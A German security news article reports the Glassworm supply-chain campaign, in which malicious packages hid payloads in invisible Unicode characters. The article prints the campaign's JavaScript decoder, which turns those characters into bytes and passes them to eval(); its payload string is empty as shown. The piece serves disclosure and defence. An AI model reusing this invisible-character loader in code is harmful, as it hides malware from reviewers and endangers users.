Lieferkettenangriff nutzt unsichtbare Unicode-Zeichen zur Umgehung der Erkennung

✍️ OpenClawRadar📅 Veröffentlicht: 15. März 2026🔗 Source
Lieferkettenangriff nutzt unsichtbare Unicode-Zeichen zur Umgehung der Erkennung
Ad

Sicherheitsforscher von Aikido Security entdeckten einen Supply-Chain-Angriff, der unsichtbare Unicode-Codes verwendet, um bösartige Funktionen in Paketen zu verbergen, die auf GitHub, NPM und Open VSX hochgeladen wurden. Die Angreifergruppe, die den Namen Glassworm erhielt, lud vom 3. bis 9. März 2026 151 schädliche Pakete auf GitHub hoch.

Wie der unsichtbare Code funktioniert

Die schädlichen Pakete verwenden Unicode-Zeichen aus Public Use Areas (auch Public Use Access genannt), die in Editoren, Terminals und Code-Review-Oberflächen unsichtbar sind. Während der größte Teil des Codes normal erscheint, werden bösartige Funktionen und Nutzlasten mit diesen unsichtbaren Zeichen dargestellt, was manuelle Code-Reviews und herkömmliche Abwehrmaßnahmen unwirksam macht.

Die unsichtbaren Unicode-Zeichen repräsentieren jeden Buchstaben des US-Alphabets, wenn sie von Computern verarbeitet werden, erscheinen für Menschen jedoch als Leerzeichen oder leere Zeilen. JavaScript-Interpreter können diese Zeichen als normalen Code lesen und ausführen.

Ad

Technische Umsetzung

In einem analysierten Paket kodierten die Angreifer eine bösartige Nutzlast mit unsichtbaren Zeichen. Der Code enthält eine Dekodierfunktion, die die versteckten Bytes extrahiert und an eval() übergibt:

const s = v => [...v].map(
  w => (
    w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null
  )
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));

Der an s() übergebene Backtick-String erscheint in Viewern leer, enthält jedoch unsichtbare Zeichen, die zu einer vollständigen bösartigen Nutzlast dekodiert werden. Bei früheren Vorfällen holten dekodierte Nutzlasten Skripte der zweiten Stufe ab und führten sie aus, wobei Solana als Lieferkanal verwendet wurde, um Token, Zugangsdaten und Geheimnisse zu stehlen.

Angriffsmerkmale

Die schädlichen Pakete sind besonders schwer zu erkennen, weil:

  • Die sichtbaren Teile des Codes von hoher Qualität und realistisch sind
  • Umgebende Änderungen Dokumentationsanpassungen, Versionserhöhungen, kleine Refactorings und Fehlerbehebungen umfassen
  • Die Änderungen stilistisch mit den Zielprojekten übereinstimmen
  • Forscher vermuten, dass LLMs verwendet werden, um überzeugend legitime Pakete zu generieren

Diese Unicode-Technik wurde erstmals 2024 verwendet, um bösartige Prompts zu verbergen, die an KI-Engines gesendet wurden, und wurde seitdem für traditionelle Malware-Angriffe angepasst. Die 151 erkannten Pakete stellen wahrscheinlich nur einen kleinen Teil der Kampagne dar, da viele seit dem ersten Hochladen gelöscht wurden.

📖 Read the full source: HN AI Agents

Ad

👀 Siehe auch

MCPwner AI-Pentesting-Tool entdeckt mehrere 0-Day-Schwachstellen in OpenClaw
Sicherheit

MCPwner AI-Pentesting-Tool entdeckt mehrere 0-Day-Schwachstellen in OpenClaw

MCPwner, ein MCP-Server, der KI-Agenten für automatisierte Penetrationstests orchestriert, identifizierte mehrere kritische 0-Day-Schwachstellen in OpenClaw, darunter Umgebungsvariablen-Injektion, Berechtigungsumgehung und Informationsoffenlegung, die Standard-Scanner übersahen.

OpenClawRadar
Frontier-KI hat CTF-Wettbewerbe gesprengt — GPT-5.5 meistert verrückte Pwn-Herausforderungen auf Anhieb
Sicherheit

Frontier-KI hat CTF-Wettbewerbe gesprengt — GPT-5.5 meistert verrückte Pwn-Herausforderungen auf Anhieb

Claude Opus 4.5 und GPT-5.5 können mittelschwere bis schwere CTF-Herausforderungen autonom lösen und verwandeln Bestenlisten in ein Maß für Orchestrierung und Token-Budget statt für Sicherheitsfähigkeiten.

OpenClawRadar
Kritische OpenClaw-Sicherheitslücken am 28.03.2026 gepatcht.
Sicherheit

Kritische OpenClaw-Sicherheitslücken am 28.03.2026 gepatcht.

OpenClaw Version 2026.3.28 behebt 8 kritische Sicherheitslücken, die vom Ant AI Security Lab entdeckt wurden, darunter Sandbox-Umgehung, Rechteausweitung und SSRF-Risiken. Nutzer mit Versionen ≤2026.3.24 sollten sofort aktualisieren.

OpenClawRadar
openclaw-credential-vault adressiert vier Wege der Anmeldedaten-Leckage in KI-Agenten
Sicherheit

openclaw-credential-vault adressiert vier Wege der Anmeldedaten-Leckage in KI-Agenten

openclaw-credential-vault bietet Betriebssystemebenen-Isolierung und subprozessbezogene Anmeldedateninjektion, um vier häufige Wege der Anmeldedatenfreigabe in OpenClaw-Setups zu verhindern. Es umfasst eine Vier-Hook-Ausgabereinigung und funktioniert mit jedem CLI-Tool oder API.

OpenClawRadar